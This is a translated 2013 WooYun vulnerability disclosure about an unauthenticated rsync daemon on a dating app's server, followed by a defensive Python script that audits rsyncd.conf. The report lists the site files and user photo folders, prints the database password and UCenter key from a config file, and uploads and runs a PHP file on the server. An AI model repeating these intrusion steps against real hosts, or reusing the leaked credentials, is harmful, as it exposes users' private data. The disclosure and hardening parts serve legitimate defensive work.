
Vulnerability summary

Defect ID: wooyun-2013-041006

Title: Mobile dating app Qingrenjie (情人结) website misconfiguration leads to data leak (a shell can be uploaded directly)

Vendor: Qingrenjie (情人结)

Author: 盈盈无绪

Submitted: 2013-10-25 16:56

Fix deadline: 2013-12-09 16:57

Disclosed: 2013-12-09 16:57

Vulnerability type: improper system/service operations configuration

Severity: High

Self-assessed rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-10-25: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2013-12-09: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

rsync misconfiguration leads to data leak

Details:

118.144.94.98 runs an rsync daemon that can be accessed directly without any authentication.
rsync 118.144.94.98::
www
Tried rsyncing the site contents to my machine; it succeeded.

rsync 118.144.94.98::www/love/
drwxrwxrwx 4096 2013/10/25 16:08:46 .
-rwxr-xr-x 2596 2011/10/11 09:48:42 admin.php
-rwxr-xr-x 741 2011/10/11 09:48:42 api.php
-rwxr-xr-x 877 2011/10/11 09:48:42 connect.php
-rwxr-xr-x 253 2011/10/11 09:48:42 cp.php
-rwxr-xr-x 106 2011/10/11 09:48:42 crossdomain.xml
-rwxr-xr-x 5558 2011/10/11 09:48:42 favicon.ico
-rwxr-xr-x 2112 2011/10/11 09:48:42 forum.php
-rwxr-xr-x 883 2011/10/11 09:48:42 group.php
-rwxr-xr-x 1096 2011/10/11 09:48:42 home.php
-rwxr-xr-x 5517 2011/10/11 09:48:42 index8.php
-rwxr-xr-x 956 2011/10/11 09:48:42 member.php
-rwxr-xr-x 1355 2011/10/11 09:48:42 misc.php
-rwxr-xr-x 1731 2011/10/11 09:48:42 plugin.php
-rwxr-xr-x 1077 2011/10/11 09:48:42 portal.php
-rwxr-xr-x 582 2011/10/11 09:48:42 robots.txt
-rwxr-xr-x 1192 2011/10/11 09:48:42 search.php
-rwxr-xr-x 1706 2011/10/11 09:48:42 userapp.php
drwxr-xr-x 4096 2011/12/02 15:42:36 api
drwxr-xr-x 4096 2011/12/02 15:42:36 archiver
drwxr-xr-x 4096 2011/12/02 15:44:56 config
drwxr-xr-x 4096 2011/12/04 19:46:44 data
drwxr-xr-x 4096 2011/12/02 16:11:56 install
drwxr-xr-x 4096 2013/10/25 16:08:09 iphone
drwxr-xr-x 4096 2012/07/11 18:51:06 mysql
drwxr-xr-x 4096 2011/12/02 15:42:36 source
drwxr-xr-x 4096 2011/12/02 15:42:36 static
drwxr-xr-x 4096 2011/12/02 15:42:38 template
drwxr-xr-x 4096 2011/12/02 15:42:40 uc_client
drwxr-xr-x 4096 2011/12/02 15:42:40 uc_server


Found a large number of user-uploaded images stored here:

rsync  118.144.94.98::www/love/data/attachment/album/
drwxr-xr-x 4096 2013/10/01 17:26:03 .
-rwxr-xr-x 0 2011/10/11 09:48:42 index.htm
drwxr-xr-x 4096 2012/03/12 13:52:25 201203
drwxr-xr-x 4096 2012/04/27 11:02:15 201204
drwxr-xr-x 4096 2012/05/31 12:04:35 201205
drwxr-xr-x 4096 2012/06/30 01:10:05 201206
drwxr-xr-x 4096 2012/07/31 00:21:19 201207
drwxr-xr-x 4096 2012/08/31 01:31:38 201208
drwxr-xr-x 4096 2012/09/30 05:21:14 201209
drwxr-xr-x 4096 2012/10/31 00:03:06 201210
drwxr-xr-x 4096 2012/11/30 03:32:52 201211
drwxr-xr-x 4096 2012/12/31 00:00:20 201212
drwxr-xr-x 4096 2013/01/31 00:00:04 201301
drwxr-xr-x 4096 2013/02/28 00:48:00 201302
drwxr-xr-x 4096 2013/03/31 01:02:25 201303
drwxr-xr-x 4096 2013/04/30 00:40:11 201304
drwxr-xr-x 4096 2013/05/31 00:26:16 201305
drwxr-xr-x 4096 2013/06/30 01:06:31 201306
drwxr-xr-x 4096 2013/07/31 00:06:46 201307
drwxr-xr-x 4096 2013/08/31 00:48:07 201308
drwxr-xr-x 4096 2013/09/30 04:10:57 201309
drwxr-xr-x 4096 2013/10/25 09:33:43 201310
drwxr-xr-x 4096 2012/03/05 14:04:10 cover


Looking at the config file, found the database password is adoado:

<?php
define('UC_CONNECT', 'mysql');
define('UC_DBHOST', 'localhost');
define('UC_DBUSER', 'love');
define('UC_DBPW', 'adoado');
define('UC_DBNAME', 'love');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', '`love`.pre_ucenter_');
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
define('UC_KEY', '02EeJ5K2q7w775F8I91186tcz9fc9cE0Q0U9B19bQ0O8Vcg329a141b8R2x8Sf09');
define('UC_API', 'http://api.qingrenjie.me:88/uc_server');
define('UC_APPID', '1');
define('UC_IP', '127.0.0.1');
define('UC_PPP', 20);


Tried logging in to UCenter with this password:
UCenter statistics
Total applications: 2
Total users: 59563
Private messages: 0
Friend records: 30
Uploaded env.php via rsync successfully.
Executed it; the output is visible:

PHP Version 5.2.17p1
System Linux SNDA-172-17-11-3 2.6.32-220.el6.x86_64 #1 SMP Tue Dec 6 19:48:22 GMT 2011 x86_64
Build Date Jul 11 2012 16:13:37
Configure Command './configure' '--prefix=/usr/local/php' '--with-config-file-path=/usr/local/php/etc' '--with-apxs2=/usr/local/apache/bin/apxs' '--with-mysql=/usr/local/mysql' '--with-mysqli=/usr/local/mysql/bin/mysql_config' '--with-iconv-dir' '--with-freetype-dir' '--with-jpeg-dir' '--with-png-dir' '--with-zlib' '--with-libxml-dir=/usr' '--enable-xml' '--disable-rpath' '--enable-discard-path' '--enable-magic-quotes' '--enable-safe-mode' '--enable-bcmath' '--enable-shmop' '--enable-sysvsem' '--enable-inline-optimization' '--with-curl' '--with-curlwrappers' '--enable-mbregex' '--enable-mbstring' '--with-mcrypt' '--enable-ftp' '--with-gd' '--enable-gd-native-ttf' '--with-openssl' '--with-mhash' '--enable-pcntl' '--enable-sockets' '--with-xmlrpc' '--enable-zip' '--enable-soap' '--without-pear' '--with-gettext' '--with-mime-magic'
Server API Apache 2.0 Handler
Virtual Directory Support disabled
Configuration File (php.ini) Path /usr/local/php/etc
Loaded Configuration File /usr/local/php/etc/php.ini


End of test.

Proof of vulnerability:

aiqingjie.png

Fix:

rsync must require authentication.
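To make the fix concrete, here is an added example (not part of the original report and not the vendor's configuration): a small Python audit of rsyncd.conf that flags the conditions behind this finding, i.e. modules that are reachable anonymously, writable, not restricted by host, or listable. The sample configurations, paths, the `deploy` user and the 10.0.0.5 address are constructed for illustration.

```python
# Defaults from rsyncd.conf(5): read-only, listable, any host, anonymous.
DEFAULTS = {"read only": "yes", "list": "yes", "hosts allow": "", "auth users": ""}
TRUE_VALUES = {"yes", "true", "1"}

def parse_rsyncd(text):
    """Return {module: {param: value}}; global parameters become module defaults."""
    globals_, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):  # new module inherits globals
            current = line[1:-1].strip()
            modules[current] = dict(globals_)
            continue
        key, _, value = line.partition("=")
        (modules[current] if current else globals_)[key.strip().lower()] = value.strip()
    return modules

def audit(text):
    # Return {module: [finding, ...]} for every module that is exposed.
    findings = {}
    for name, params in parse_rsyncd(text).items():
        cfg = {**DEFAULTS, **params}
        checks = [
            (not cfg["auth users"], "anonymous access: no 'auth users'"),
            (cfg["read only"].lower() not in TRUE_VALUES, "writable: clients can upload files"),
            (not cfg["hosts allow"], "no 'hosts allow': reachable from any address"),
            (cfg["list"].lower() in TRUE_VALUES, "listable: shows up in 'rsync host::'"),
        ]
        issues = [msg for hit, msg in checks if hit]
        if issues:
            findings[name] = issues
    return findings

# Constructed sample resembling this report's exposure (hypothetical paths).
WEAK_CONF = """\
[www]
    path = /data/www
    read only = no
"""
# Hardened: authenticated, read-only, host-restricted, unlisted, credentials dir excluded.
HARDENED_CONF = """\
list = no
hosts allow = 10.0.0.5
[www]
    path = /data/www
    auth users = deploy
    secrets file = /etc/rsyncd.secrets
    exclude = config/
"""
```

Running `audit(WEAK_CONF)` reports all four weaknesses on the `www` module, while `audit(HARDENED_CONF)` reports nothing; the `exclude` line keeps the directory holding the database credentials out of the mirror even for authenticated clients.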

Copyright notice: please credit the source when reposting: 盈盈无绪@乌云


Vulnerability responses

Vendor response:

Unable to contact the vendor, or the vendor actively declined to respond